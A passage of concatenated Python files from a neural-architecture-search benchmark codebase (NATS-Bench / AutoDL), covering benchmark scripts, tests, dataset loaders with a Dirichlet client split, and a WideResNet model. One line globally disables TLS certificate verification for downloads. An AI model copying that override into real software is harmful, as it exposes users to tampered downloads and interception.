new_nets.append(str(C) if net == "" else "{:}:{:}".format(net, C))
nets = new_nets
return nets
def filter_indexes(xlist, mode, save_dir, seeds):
all_indexes = []
for index in xlist:
if mode == "cover":
all_indexes.append(index)
else:
for seed in seeds:
temp_path = save_dir / "arch-{:06d}-seed-{:04d}.pth".format(index, seed)
if not temp_path.exists():
all_indexes.append(index)
break
print(
"{:} [FILTER-INDEXES] : there are {:}/{:} architectures in total".format(
time_string(), len(all_indexes), len(xlist)
)
)
SLURM_PROCID, SLURM_NTASKS = "SLURM_PROCID", "SLURM_NTASKS"
if SLURM_PROCID in os.environ and SLURM_NTASKS in os.environ: # run on the slurm
proc_id, ntasks = int(os.environ[SLURM_PROCID]), int(os.environ[SLURM_NTASKS])
assert 0 <= proc_id < ntasks, "invalid proc_id {:} vs ntasks {:}".format(
proc_id, ntasks
)
scales = [int(float(i) / ntasks * len(all_indexes)) for i in range(ntasks)] + [
len(all_indexes)
]
per_job = []
for i in range(ntasks):
xs, xe = min(max(scales[i], 0), len(all_indexes) - 1), min(
max(scales[i + 1] - 1, 0), len(all_indexes) - 1
)
per_job.append((xs, xe))
for i, srange in enumerate(per_job):
print(" -->> {:2d}/{:02d} : {:}".format(i, ntasks, srange))
current_range = per_job[proc_id]
all_indexes = [
all_indexes[i] for i in range(current_range[0], current_range[1] + 1)
]
# set the device id
device = proc_id % torch.cuda.device_count()
torch.cuda.set_device(device)
print(" set the device id = {:}".format(device))
print(
"{:} [FILTER-INDEXES] : after filtering there are {:} architectures in total".format(
time_string(), len(all_indexes)
)
)
return all_indexes
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="NATS-Bench (size search space)",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--mode",
type=str,
required=True,
choices=["new", "cover"],
help="The script mode.",
)
parser.add_argument(
"--save_dir",
type=str,
default="output/NATS-Bench-size",
help="Folder to save checkpoints and log.",
)
parser.add_argument(
"--candidateC",
type=int,
nargs="+",
default=[8, 16, 24, 32, 40, 48, 56, 64],
help=".",
)
parser.add_argument(
"--num_layers", type=int, default=5, help="The number of layers in a network."
)
parser.add_argument("--check_N", type=int, default=32768, help="For safety.")
# use for train the model
parser.add_argument(
"--workers",
type=int,
default=8,
help="The number of data loading workers (default: 2)",
)
parser.add_argument(
"--srange", type=str, required=True, help="The range of models to be evaluated"
)
parser.add_argument("--datasets", type=str, nargs="+", help="The applied datasets.")
parser.add_argument(
"--xpaths", type=str, nargs="+", help="The root path for this dataset."
)
parser.add_argument(
"--splits", type=int, nargs="+", help="The root path for this dataset."
)
parser.add_argument(
"--hyper",
type=str,
default="12",
choices=["01", "12", "90"],
help="The tag for hyper-parameters.",
)
parser.add_argument(
"--seeds", type=int, nargs="+", help="The range of models to be evaluated"
)
args = parser.parse_args()
nets = traverse_net(args.candidateC, args.num_layers)
if len(nets) != args.check_N:
raise ValueError(
"Pre-num-check failed : {:} vs {:}".format(len(nets), args.check_N)
)
opt_config = "./configs/nas-benchmark/hyper-opts/{:}E.config".format(args.hyper)
if not os.path.isfile(opt_config):
raise ValueError("{:} is not a file.".format(opt_config))
save_dir = Path(args.save_dir) / "raw-data-{:}".format(args.hyper)
save_dir.mkdir(parents=True, exist_ok=True)
to_evaluate_indexes = split_str2indexes(args.srange, args.check_N, 5)
if not len(args.seeds):
raise ValueError("invalid length of seeds args: {:}".format(args.seeds))
if not (len(args.datasets) == len(args.xpaths) == len(args.splits)):
raise ValueError(
"invalid infos : {:} vs {:} vs {:}".format(
len(args.datasets), len(args.xpaths), len(args.splits)
)
)
if args.workers <= 0:
raise ValueError("invalid number of workers : {:}".format(args.workers))
target_indexes = filter_indexes(
to_evaluate_indexes, args.mode, save_dir, args.seeds
)
assert torch.cuda.is_available(), "CUDA is not available."
torch.backends.cudnn.enabled = True
torch.backends.cudnn.deterministic = True
# torch.set_num_threads(args.workers)
main(
save_dir,
args.workers,
args.datasets,
args.xpaths,
args.splits,
tuple(args.seeds),
nets,
opt_config,
target_indexes,
args.mode == "cover",
)
```
#### File: exps/NATS-Bench/tss-collect-patcher.py
```python
import os, re, sys, time, shutil, random, argparse, collections
import numpy as np
from copy import deepcopy
import torch
from tqdm import tqdm
from pathlib import Path
from collections import defaultdict, OrderedDict
from typing import Dict, Any, Text, List
from xautodl.log_utils import AverageMeter, time_string, convert_secs2time
from xautodl.config_utils import load_config, dict2config
from xautodl.datasets import get_datasets
from xautodl.models import CellStructure, get_cell_based_tiny_net, get_search_spaces
from xautodl.procedures import (
bench_pure_evaluate as pure_evaluate,
get_nas_bench_loaders,
)
from xautodl.utils import get_md5_file
from nats_bench import pickle_save, pickle_load, ArchResults, ResultsCount
from nas_201_api import NASBench201API
NATS_TSS_BASE_NAME = "NATS-tss-v1_0" # 2020.08.28
def simplify(save_dir, save_name, nets, total, sup_config):
hps, seeds = ["12", "200"], set()
for hp in hps:
sub_save_dir = save_dir / "raw-data-{:}".format(hp)
ckps = sorted(list(sub_save_dir.glob("arch-*-seed-*.pth")))
seed2names = defaultdict(list)
for ckp in ckps:
parts = re.split("-|\.", ckp.name)
seed2names[parts[3]].append(ckp.name)
print("DIR : {:}".format(sub_save_dir))
nums = []
for seed, xlist in seed2names.items():
seeds.add(seed)
nums.append(len(xlist))
print(" [seed={:}] there are {:} checkpoints.".format(seed, len(xlist)))
assert (
len(nets) == total == max(nums)
), "there are some missed files : {:} vs {:}".format(max(nums), total)
print("{:} start simplify the checkpoint.".format(time_string()))
datasets = ("cifar10-valid", "cifar10", "cifar100", "ImageNet16-120")
# Create the directory to save the processed data
# full_save_dir contains all benchmark files with trained weights.
# simplify_save_dir contains all benchmark files without trained weights.
full_save_dir = save_dir / (save_name + "-FULL")
simple_save_dir = save_dir / (save_name + "-SIMPLIFY")
full_save_dir.mkdir(parents=True, exist_ok=True)
simple_save_dir.mkdir(parents=True, exist_ok=True)
# all data in memory
arch2infos, evaluated_indexes = dict(), set()
end_time, arch_time = time.time(), AverageMeter()
# save the meta information
for index in tqdm(range(total)):
arch_str = nets[index]
hp2info = OrderedDict()
simple_save_path = simple_save_dir / "{:06d}.pickle".format(index)
arch2infos[index] = pickle_load(simple_save_path)
evaluated_indexes.add(index)
# measure elapsed time
arch_time.update(time.time() - end_time)
end_time = time.time()
need_time = "{:}".format(
convert_secs2time(arch_time.avg * (total - index - 1), True)
)
# print('{:} {:06d}/{:06d} : still need {:}'.format(time_string(), index, total, need_time))
print("{:} {:} done.".format(time_string(), save_name))
final_infos = {
"meta_archs": nets,
"total_archs": total,
"arch2infos": arch2infos,
"evaluated_indexes": evaluated_indexes,
}
save_file_name = save_dir / "{:}.pickle".format(save_name)
pickle_save(final_infos, str(save_file_name))
# move the benchmark file to a new path
hd5sum = get_md5_file(str(save_file_name) + ".pbz2")
hd5_file_name = save_dir / "{:}-{:}.pickle.pbz2".format(NATS_TSS_BASE_NAME, hd5sum)
shutil.move(str(save_file_name) + ".pbz2", hd5_file_name)
print(
"Save {:} / {:} architecture results into {:} -> {:}.".format(
len(evaluated_indexes), total, save_file_name, hd5_file_name
)
)
# move the directory to a new path
hd5_full_save_dir = save_dir / "{:}-{:}-full".format(NATS_TSS_BASE_NAME, hd5sum)
hd5_simple_save_dir = save_dir / "{:}-{:}-simple".format(NATS_TSS_BASE_NAME, hd5sum)
shutil.move(full_save_dir, hd5_full_save_dir)
shutil.move(simple_save_dir, hd5_simple_save_dir)
def traverse_net(max_node):
aa_nas_bench_ss = get_search_spaces("cell", "nats-bench")
archs = CellStructure.gen_all(aa_nas_bench_ss, max_node, False)
print(
"There are {:} archs vs {:}.".format(
len(archs), len(aa_nas_bench_ss) ** ((max_node - 1) * max_node / 2)
)
)
random.seed(88) # please do not change this line for reproducibility
random.shuffle(archs)
assert (
archs[0].tostr()
== "|avg_pool_3x3~0|+|nor_conv_1x1~0|skip_connect~1|+|nor_conv_1x1~0|skip_connect~1|skip_connect~2|"
), "please check the 0-th architecture : {:}".format(archs[0])
assert (
archs[9].tostr()
== "|avg_pool_3x3~0|+|none~0|none~1|+|skip_connect~0|none~1|nor_conv_3x3~2|"
), "please check the 9-th architecture : {:}".format(archs[9])
assert (
archs[123].tostr()
== "|avg_pool_3x3~0|+|avg_pool_3x3~0|nor_conv_1x1~1|+|none~0|avg_pool_3x3~1|nor_conv_3x3~2|"
), "please check the 123-th architecture : {:}".format(archs[123])
return [x.tostr() for x in archs]
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="NATS-Bench (topology search space)",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--base_save_dir",
type=str,
default="./output/NATS-Bench-topology",
help="The base-name of folder to save checkpoints and log.",
)
parser.add_argument(
"--max_node", type=int, default=4, help="The maximum node in a cell."
)
parser.add_argument(
"--channel", type=int, default=16, help="The number of channels."
)
parser.add_argument(
"--num_cells", type=int, default=5, help="The number of cells in one stage."
)
parser.add_argument("--check_N", type=int, default=15625, help="For safety.")
parser.add_argument(
"--save_name", type=str, default="process", help="The save directory."
)
args = parser.parse_args()
nets = traverse_net(args.max_node)
if len(nets) != args.check_N:
raise ValueError(
"Pre-num-check failed : {:} vs {:}".format(len(nets), args.check_N)
)
save_dir = Path(args.base_save_dir)
simplify(
save_dir,
args.save_name,
nets,
args.check_N,
{"name": "infer.tiny", "channel": args.channel, "num_cells": args.num_cells},
)
```
#### File: AutoDL-Projects/tests/test_loader.py
```python
import unittest
import tempfile
import torch
from xautodl.datasets import get_datasets
def test_simple():
xdir = tempfile.mkdtemp()
train_data, valid_data, xshape, class_num = get_datasets("cifar10", xdir, -1)
print(train_data)
print(valid_data)
xloader = torch.utils.data.DataLoader(
train_data, batch_size=256, shuffle=True, num_workers=4, pin_memory=True
)
print(xloader)
print(next(iter(xloader)))
for i, data in enumerate(xloader):
print(i)
test_simple()
```
#### File: AutoDL-Projects/tests/test_super_norm.py
```python
import unittest
import torch
from xautodl.xlayers import super_core
from xautodl import spaces
class TestSuperSimpleNorm(unittest.TestCase):
"""Test the super simple norm."""
def test_super_simple_norm(self):
out_features = spaces.Categorical(12, 24, 36)
bias = spaces.Categorical(True, False)
model = super_core.SuperSequential(
super_core.SuperSimpleNorm(5, 0.5),
super_core.SuperLinear(10, out_features, bias=bias),
)
print("The simple super module is:\n{:}".format(model))
model.apply_verbose(True)
print(model.super_run_type)
self.assertTrue(model[1].bias)
inputs = torch.rand(20, 10)
print("Input shape: {:}".format(inputs.shape))
outputs = model(inputs)
self.assertEqual(tuple(outputs.shape), (20, 36))
abstract_space = model.abstract_search_space
abstract_space.clean_last()
abstract_child = abstract_space.random()
print("The abstract searc space:\n{:}".format(abstract_space))
print("The abstract child program:\n{:}".format(abstract_child))
model.set_super_run_type(super_core.SuperRunMode.Candidate)
model.enable_candidate()
model.apply_candidate(abstract_child)
output_shape = (20, abstract_child["1"]["_out_features"].value)
outputs = model(inputs)
self.assertEqual(tuple(outputs.shape), output_shape)
def test_super_simple_learn_norm(self):
out_features = spaces.Categorical(12, 24, 36)
bias = spaces.Categorical(True, False)
model = super_core.SuperSequential(
super_core.SuperSimpleLearnableNorm(),
super_core.SuperIdentity(),
super_core.SuperLinear(10, out_features, bias=bias),
)
print("The simple super module is:\n{:}".format(model))
model.apply_verbose(True)
print(model.super_run_type)
self.assertTrue(model[2].bias)
inputs = torch.rand(20, 10)
print("Input shape: {:}".format(inputs.shape))
outputs = model(inputs)
self.assertEqual(tuple(outputs.shape), (20, 36))
abstract_space = model.abstract_search_space
abstract_space.clean_last()
abstract_child = abstract_space.random()
print("The abstract searc space:\n{:}".format(abstract_space))
print("The abstract child program:\n{:}".format(abstract_child))
model.set_super_run_type(super_core.SuperRunMode.Candidate)
model.enable_candidate()
model.apply_candidate(abstract_child)
output_shape = (20, abstract_child["2"]["_out_features"].value)
outputs = model(inputs)
self.assertEqual(tuple(outputs.shape), output_shape)
```
#### File: xautodl/config_utils/share_args.py
```python
import os, sys, time, random, argparse
def add_shared_args(parser):
# Data Generation
parser.add_argument("--dataset", type=str, help="The dataset name.")
parser.add_argument("--data_path", type=str, help="The dataset name.")
parser.add_argument(
"--cutout_length", type=int, help="The cutout length, negative means not use."
)
# Printing
parser.add_argument(
"--print_freq", type=int, default=100, help="print frequency (default: 200)"
)
parser.add_argument(
"--print_freq_eval",
type=int,
default=100,
help="print frequency (default: 200)",
)
# Checkpoints
parser.add_argument(
"--eval_frequency",
type=int,
default=1,
help="evaluation frequency (default: 200)",
)
parser.add_argument(
"--save_dir", type=str, help="Folder to save checkpoints and log."
)
# Acceleration
parser.add_argument(
"--workers",
type=int,
default=8,
help="number of data loading workers (default: 8)",
)
# Random Seed
parser.add_argument("--rand_seed", type=int, default=-1, help="manual seed")
```
#### File: xautodl/datasets/get_dataset_with_transform.py
```python
import os, sys, torch
import os.path as osp
import numpy as np
import torchvision.datasets as dset
import torchvision.transforms as transforms
from copy import deepcopy
from PIL import Image
from xautodl.config_utils import load_config
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
from .DownsampledImageNet import ImageNet16
from .SearchDatasetWrap import SearchDataset
from torch.utils.data import DataLoader, Dataset
import random
import json
import pandas as pd
Dataset2Class = {
"cifar10": 10,
"cifar100": 100,
"imagenet-1k-s": 1000,
"imagenet-1k": 1000,
"ImageNet16": 1000,
"ImageNet16-150": 150,
"ImageNet16-120": 120,
"ImageNet16-200": 200,
"mini-imagenet":100
}
class MyDataSet(Dataset):
"""自定义数据集"""
def __init__(self,
root_dir: str,
csv_name: str,
json_path: str,
transform=None):
images_dir = os.path.join(root_dir, "images")
assert os.path.exists(images_dir), "dir:'{}' not found.".format(images_dir)
assert os.path.exists(json_path), "file:'{}' not found.".format(json_path)
self.label_dict = json.load(open(json_path, "r"))
csv_path = os.path.join(root_dir, csv_name)
assert os.path.exists(csv_path), "file:'{}' not found.".format(csv_path)
csv_data = pd.read_csv(csv_path)
self.total_num = csv_data.shape[0]
self.img_paths = [os.path.join(images_dir, i) for i in csv_data["filename"].values]
self.img_label = [self.label_dict[i][0] for i in csv_data["label"].values]
self.labels = set(csv_data["label"].values)
self.transform = transform
def __len__(self):
return self.total_num
def __getitem__(self, item):
img = Image.open(self.img_paths[item])
# RGB为彩色图片,L为灰度图片
if img.mode != 'RGB':
raise ValueError("image: {} isn't RGB mode.".format(self.img_paths[item]))
label = self.img_label[item]
if self.transform is not None:
img = self.transform(img)
return img, label
@staticmethod
def collate_fn(batch):
images, labels = tuple(zip(*batch))
images = torch.stack(images, dim=0)
labels = torch.as_tensor(labels)
return images, labels
class DatasetSplit(Dataset):
"""An abstract Dataset class wrapped around Pytorch Dataset class.
"""
def __init__(self, dataset, idxs):
self.dataset = dataset
self.idxs = [int(i) for i in idxs]
def __len__(self):
return len(self.idxs)
def __getitem__(self, item):
image, label = self.dataset[self.idxs[item]]
return torch.tensor(image), torch.tensor(label)
def randomSplit(M, N, minV, maxV):
res = []
while N > 0:
l = max(minV, M - (N-1)*maxV)
r = min(maxV, M - (N-1)*minV)
num = random.randint(l, r)
N -= 1
M -= num
res.append(num)
print(res)
return res
def uniform(N, k):
"""Uniform distribution of 'N' items into 'k' groups."""
dist = []
avg = N / k
# Make distribution
for i in range(k):
dist.append(int((i + 1) * avg) - int(i * avg))
# Return shuffled distribution
random.shuffle(dist)
return dist
def normal(N, k):
"""Normal distribution of 'N' items into 'k' groups."""
dist = []
# Make distribution
for i in range(k):
x = i - (k - 1) / 2
dist.append(int(N * (np.exp(-x) / (np.exp(-x) + 1)**2)))
# Add remainders
remainder = N - sum(dist)
dist = list(np.add(dist, uniform(remainder, k)))
# Return non-shuffled distribution
return dist
def data_organize(idxs_labels, labels):
data_dict = {}
labels = np.unique(labels, axis=0)
for one in labels:
data_dict[one] = []
for i in range(len(idxs_labels[1, :])):
data_dict[idxs_labels[1, i]].append(idxs_labels[0, i])
return data_dict
def data_partition(training_data, testing_data, alpha, user_num):
idxs_train = np.arange(len(training_data))
idxs_valid = np.arange(len(testing_data))
if hasattr(training_data, 'targets'):
labels_train = training_data.targets
labels_valid = testing_data.targets
elif hasattr(training_data, 'img_label'):
labels_train = training_data.img_label
labels_valid = testing_data.img_label
idxs_labels_train = np.vstack((idxs_train, labels_train))
idxs_labels_train = idxs_labels_train[:, idxs_labels_train[1,:].argsort()]
idxs_labels_valid = np.vstack((idxs_valid, labels_valid))
idxs_labels_valid = idxs_labels_valid[:, idxs_labels_valid[1,:].argsort()]
labels = np.unique(labels_train, axis=0)
data_train_dict = data_organize(idxs_labels_train, labels)
data_valid_dict = data_organize(idxs_labels_valid, labels)
data_partition_profile_train = {}
data_partition_profile_valid = {}
for i in range(user_num):
data_partition_profile_train[i] = []
data_partition_profile_valid[i] = []
## Setting the public data
public_data = set([])
for label in data_train_dict:
tep = set(np.random.choice(data_train_dict[label], int(len(data_train_dict[label])/20), replace = False))
public_data = set.union(public_data, tep)
data_train_dict[label] = list(set(data_train_dict[label])-tep)
public_data = list(public_data)
np.random.shuffle(public_data)
## Distribute rest data
for label in data_train_dict:
proportions = np.random.dirichlet(np.repeat(alpha, user_num))
proportions_train = len(data_train_dict[label])*proportions
proportions_valid = len(data_valid_dict[label]) * proportions
for user in data_partition_profile_train:
data_partition_profile_train[user] \
= set.union(set(np.random.choice(data_train_dict[label], int(proportions_train[user]) , replace = False)), data_partition_profile_train[user])
data_train_dict[label] = list(set(data_train_dict[label])-data_partition_profile_train[user])
data_partition_profile_valid[user] = set.union(set(
np.random.choice(data_valid_dict[label], int(proportions_valid[user]),
replace=False)), data_partition_profile_valid[user])
data_valid_dict[label] = list(set(data_valid_dict[label]) - data_partition_profile_valid[user])
while len(data_train_dict[label]) != 0:
rest_data = data_train_dict[label][0]
user = np.random.randint(0, user_num)
data_partition_profile_train[user].add(rest_data)
data_train_dict[label].remove(rest_data)
while len(data_valid_dict[label]) != 0:
rest_data = data_valid_dict[label][0]
user = np.random.randint(0, user_num)
data_partition_profile_valid[user].add(rest_data)
data_valid_dict[label].remove(rest_data)
for user in data_partition_profile_train:
data_partition_profile_train[user] = list(data_partition_profile_train[user])
data_partition_profile_valid[user] = list(data_partition_profile_valid[user])
np.random.shuffle(data_partition_profile_train[user])
np.random.shuffle(data_partition_profile_valid[user])
return data_partition_profile_train, data_partition_profile_valid, public_data
class CUTOUT(object):
def __init__(self, length):
self.length = length
def __repr__(self):
return "{name}(length={length})".format(
name=self.__class__.__name__, **self.__dict__
)
def __call__(self, img):
h, w = img.size(1), img.size(2)
mask = np.ones((h, w), np.float32)
y = np.random.randint(h)
x = np.random.randint(w)
y1 = np.clip(y - self.length // 2, 0, h)
y2 = np.clip(y + self.length // 2, 0, h)
x1 = np.clip(x - self.length // 2, 0, w)
x2 = np.clip(x + self.length // 2, 0, w)
mask[y1:y2, x1:x2] = 0.0
mask = torch.from_numpy(mask)
mask = mask.expand_as(img)
img *= mask
return img
imagenet_pca = {
"eigval": np.asarray([0.2175, 0.0188, 0.0045]),
"eigvec": np.asarray(
[
[-0.5675, 0.7192, 0.4009],
[-0.5808, -0.0045, -0.8140],
[-0.5836, -0.6948, 0.4203],
]
),
}
class Lighting(object):
def __init__(
self, alphastd, eigval=imagenet_pca["eigval"], eigvec=imagenet_pca["eigvec"]
):
self.alphastd = alphastd
assert eigval.shape == (3,)
assert eigvec.shape == (3, 3)
self.eigval = eigval
self.eigvec = eigvec
def __call__(self, img):
if self.alphastd == 0.0:
return img
rnd = np.random.randn(3) * self.alphastd
rnd = rnd.astype("float32")
v = rnd
old_dtype = np.asarray(img).dtype
v = v * self.eigval
v = v.reshape((3, 1))
inc = np.dot(self.eigvec, v).reshape((3,))
img = np.add(img, inc)
if old_dtype == np.uint8:
img = np.clip(img, 0, 255)
img = Image.fromarray(img.astype(old_dtype), "RGB")
return img
def __repr__(self):
return self.__class__.__name__ + "()"
def get_datasets(name, root, cutout):
if name == "cifar10":
mean = [x / 255 for x in [125.3, 123.0, 113.9]]
std = [x / 255 for x in [63.0, 62.1, 66.7]]
elif name == "cifar100":
mean = [x / 255 for x in [129.3, 124.1, 112.4]]
std = [x / 255 for x in [68.2, 65.4, 70.4]]
elif name.startswith("imagenet-1k"):
mean, std = [0.485, 0.456, 0.406], [0.229, 0.224, 0.225]
elif name.startswith("ImageNet16"):
mean = [x / 255 for x in [122.68, 116.66, 104.01]]
std = [x / 255 for x in [63.22, 61.26, 65.09]]
elif name.startswith("mini-imagenet"):
mean, std = [0.485, 0.456, 0.406], [0.229, 0.224, 0.225]
else:
raise TypeError("Unknow dataset : {:}".format(name))
# Data Argumentation
if name == "cifar10" or name == "cifar100":
lists = [
transforms.RandomHorizontalFlip(),
transforms.RandomCrop(32, padding=4),
transforms.ToTensor(),
transforms.Normalize(mean, std),
]
if cutout > 0:
lists += [CUTOUT(cutout)]
train_transform = transforms.Compose(lists)
test_transform = transforms.Compose(
[transforms.ToTensor(), transforms.Normalize(mean, std)]
)
xshape = (1, 3, 32, 32)
elif name.startswith("ImageNet16"):
lists = [
transforms.RandomHorizontalFlip(),
transforms.RandomCrop(16, padding=2),
transforms.ToTensor(),
transforms.Normalize(mean, std),
]
if cutout > 0:
lists += [CUTOUT(cutout)]
train_transform = transforms.Compose(lists)
test_transform = transforms.Compose(
[transforms.ToTensor(), transforms.Normalize(mean, std)]
)
xshape = (1, 3, 16, 16)
elif name == "tiered":
lists = [
transforms.RandomHorizontalFlip(),
transforms.RandomCrop(80, padding=4),
transforms.ToTensor(),
transforms.Normalize(mean, std),
]
if cutout > 0:
lists += [CUTOUT(cutout)]
train_transform = transforms.Compose(lists)
test_transform = transforms.Compose(
[
transforms.CenterCrop(80),
transforms.ToTensor(),
transforms.Normalize(mean, std),
]
)
xshape = (1, 3, 32, 32)
elif name.startswith("imagenet-1k"):
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]
)
if name == "imagenet-1k":
xlists = [transforms.RandomResizedCrop(224)]
xlists.append(
transforms.ColorJitter(
brightness=0.4, contrast=0.4, saturation=0.4, hue=0.2
)
)
xlists.append(Lighting(0.1))
elif name == "imagenet-1k-s":
xlists = [transforms.RandomResizedCrop(224, scale=(0.2, 1.0))]
else:
raise ValueError("invalid name : {:}".format(name))
xlists.append(transforms.RandomHorizontalFlip(p=0.5))
xlists.append(transforms.ToTensor())
xlists.append(normalize)
train_transform = transforms.Compose(xlists)
test_transform = transforms.Compose(
[
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize,
]
)
xshape = (1, 3, 224, 224)
elif name == "mini-imagenet":
train_transform = transforms.Compose([transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(mean, std)])
test_transform = transforms.Compose([transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(mean, std)])
xshape = (1, 3, 224, 224)
else:
raise TypeError("Unknow dataset : {:}".format(name))
if name == "cifar10":
train_data = dset.CIFAR10(
root, train=True, transform=train_transform, download=True
)
test_data = dset.CIFAR10(
root, train=False, transform=test_transform, download=True
)
assert len(train_data) == 50000 and len(test_data) == 10000
elif name == "cifar100":
train_data = dset.CIFAR100(
root, train=True, transform=train_transform, download=True
)
test_data = dset.CIFAR100(
root, train=False, transform=test_transform, download=True
)
assert len(train_data) == 50000 and len(test_data) == 10000
elif name.startswith("imagenet-1k"):
train_data = dset.ImageFolder(osp.join(root, "train"), train_transform)
test_data = dset.ImageFolder(osp.join(root, "val"), test_transform)
assert (
len(train_data) == 1281167 and len(test_data) == 50000
), "invalid number of images : {:} & {:} vs {:} & {:}".format(
len(train_data), len(test_data), 1281167, 50000
)
elif name == "ImageNet16":
train_data = ImageNet16(root, True, train_transform)
test_data = ImageNet16(root, False, test_transform)
assert len(train_data) == 1281167 and len(test_data) == 50000
elif name == "ImageNet16-120":
train_data = ImageNet16(root, True, train_transform, 120)
test_data = ImageNet16(root, False, test_transform, 120)
assert len(train_data) == 151700 and len(test_data) == 6000
elif name == "ImageNet16-150":
train_data = ImageNet16(root, True, train_transform, 150)
test_data = ImageNet16(root, False, test_transform, 150)
assert len(train_data) == 190272 and len(test_data) == 7500
elif name == "ImageNet16-200":
train_data = ImageNet16(root, True, train_transform, 200)
test_data = ImageNet16(root, False, test_transform, 200)
assert len(train_data) == 254775 and len(test_data) == 10000
elif name == "mini-imagenet":
print("Preparing Mini-ImageNet dataset")
json_path = "./classes_name.json"
data_root = "./mini-imagenet/"
train_data = MyDataSet(root_dir=data_root,
csv_name="new_train.csv",
json_path=json_path,
transform=train_transform)
test_data = MyDataSet(root_dir=data_root,
csv_name="new_test.csv",
json_path=json_path,
transform=test_transform)
else:
raise TypeError("Unknow dataset : {:}".format(name))
class_num = Dataset2Class[name]
return train_data, test_data, xshape, class_num
def get_nas_search_loaders(
train_data, valid_data, dataset, config_root, batch_size, workers
):
valid_use = False
if isinstance(batch_size, (list, tuple)):
batch, test_batch = batch_size
else:
batch, test_batch = batch_size, batch_size
if dataset == "cifar10" or dataset == 'cifar100' or dataset == 'mini-imagenet':
xvalid_data = deepcopy(train_data)
alpha = 0.5
# random.seed(61)
# np.random.seed(61)
# user_data = {}
# tep_train, tep_valid, tep_public = data_partition(train_data, valid_data, alpha, 5)
#
# for one in tep_train:
# if valid_use:
# # a = np.random.choice(tep[one], int(len(tep[one])/2), replace=False)
# user_data[one] = {'train': tep_train[one], 'test': tep_valid[one]}
# else:
# a = np.random.choice(tep_train[one], int(len(tep_train[one]) / 2), replace=False)
# user_data[one] = {'train': list(set(a)), 'test': list(set(tep_train[one]) - set(a)),
# 'valid': tep_valid[one]}
#
#
# user_data["public"] = tep_public
# np.save('Dirichlet_{}_Use_valid_{}_{}_non_iid_setting.npy'.format(alpha, valid_use, dataset), user_data)
user_data = np.load('Dirichlet_{}_Use_valid_{}_{}_non_iid_setting.npy'.format(alpha, valid_use, dataset),
allow_pickle=True).item()
if hasattr(xvalid_data, "transforms"): # to avoid a print issue
xvalid_data.transforms = valid_data.transform
xvalid_data.transform = deepcopy(valid_data.transform)
search_loader = {}
valid_loader = {}
train_loader = {}
for one in user_data:
if isinstance(one, int):
if valid_use:
search_data = SearchDataset(dataset, [train_data, valid_data], user_data[one]['train'],
user_data[one]['test'])
valid_loader[one] = torch.utils.data.DataLoader(
xvalid_data,
batch_size=test_batch,
sampler=torch.utils.data.sampler.SubsetRandomSampler(user_data[one]['test']),
num_workers=workers,
pin_memory=True,
)
else:
search_data = SearchDataset(dataset, train_data, user_data[one]['train'], user_data[one]['test'])
valid_loader[one] = torch.utils.data.DataLoader(
xvalid_data,
batch_size=test_batch,
sampler=torch.utils.data.sampler.SubsetRandomSampler(user_data[one]['valid']),
num_workers=workers,
pin_memory=True,
)
# data loader
search_loader[one] = torch.utils.data.DataLoader(
search_data,
batch_size=batch,
shuffle=True,
num_workers=workers,
pin_memory=True,
)
train_loader[one] = torch.utils.data.DataLoader(
train_data,
batch_size=batch,
sampler=torch.utils.data.sampler.SubsetRandomSampler(user_data[one]['train']),
num_workers=workers,
pin_memory=True,
)
elif dataset == "ImageNet16-120":
imagenet_test_split = load_config(
"{:}/imagenet-16-120-test-split.txt".format(config_root), None, None
)
search_train_data = train_data
search_valid_data = deepcopy(valid_data)
search_valid_data.transform = train_data.transform
search_data = SearchDataset(
dataset,
[search_train_data, search_valid_data],
list(range(len(search_train_data))),
imagenet_test_split.xvalid,
)
search_loader = torch.utils.data.DataLoader(
search_data,
batch_size=batch,
shuffle=True,
num_workers=workers,
pin_memory=True,
)
train_loader = torch.utils.data.DataLoader(
train_data,
batch_size=batch,
shuffle=True,
num_workers=workers,
pin_memory=True,
)
valid_loader = torch.utils.data.DataLoader(
valid_data,
batch_size=test_batch,
sampler=torch.utils.data.sampler.SubsetRandomSampler(
imagenet_test_split.xvalid
),
num_workers=workers,
pin_memory=True,
)
else:
raise ValueError("invalid dataset : {:}".format(dataset))
return search_loader, train_loader, valid_loader
if __name__ == '__main__':
np.random.seed(61)
train_data, test_data, xshape, class_num = get_datasets('cifar10', '/data02/dongxuanyi/.torch/cifar.python/', -1)
data_partition(train_data, test_data, 0.5, 5)
```
#### File: xautodl/models/CifarWideResNet.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from .initialization import initialize_resnet
class WideBasicblock(nn.Module):
def __init__(self, inplanes, planes, stride, dropout=False):
super(WideBasicblock, self).__init__()
self.bn_a = nn.BatchNorm2d(inplanes)
self.conv_a = nn.Conv2d(
inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False
)
self.bn_b = nn.BatchNorm2d(planes)
if dropout:
self.dropout = nn.Dropout2d(p=0.5, inplace=True)
else:
self.dropout = None
self.conv_b = nn.Conv2d(
planes, planes, kernel_size=3, stride=1, padding=1, bias=False
)
if inplanes != planes:
self.downsample = nn.Conv2d(
inplanes, planes, kernel_size=1, stride=stride, padding=0, bias=False
)
else:
self.downsample = None
def forward(self, x):
basicblock = self.bn_a(x)
basicblock = F.relu(basicblock)
basicblock = self.conv_a(basicblock)
basicblock = self.bn_b(basicblock)
basicblock = F.relu(basicblock)
if self.dropout is not None:
basicblock = self.dropout(basicblock)
basicblock = self.conv_b(basicblock)
if self.downsample is not None:
x = self.downsample(x)
return x + basicblock
class CifarWideResNet(nn.Module):
"""
ResNet optimized for the Cifar dataset, as specified in
https://arxiv.org/abs/1512.03385.pdf
"""
def __init__(self, depth, widen_factor, num_classes, dropout):
super(CifarWideResNet, self).__init__()
# Model type specifies number of layers for CIFAR-10 and CIFAR-100 model
assert (depth - 4) % 6 == 0, "depth should be one of 20, 32, 44, 56, 110"
layer_blocks = (depth - 4) // 6
print(
"CifarPreResNet : Depth : {} , Layers for each block : {}".format(
depth, layer_blocks
)
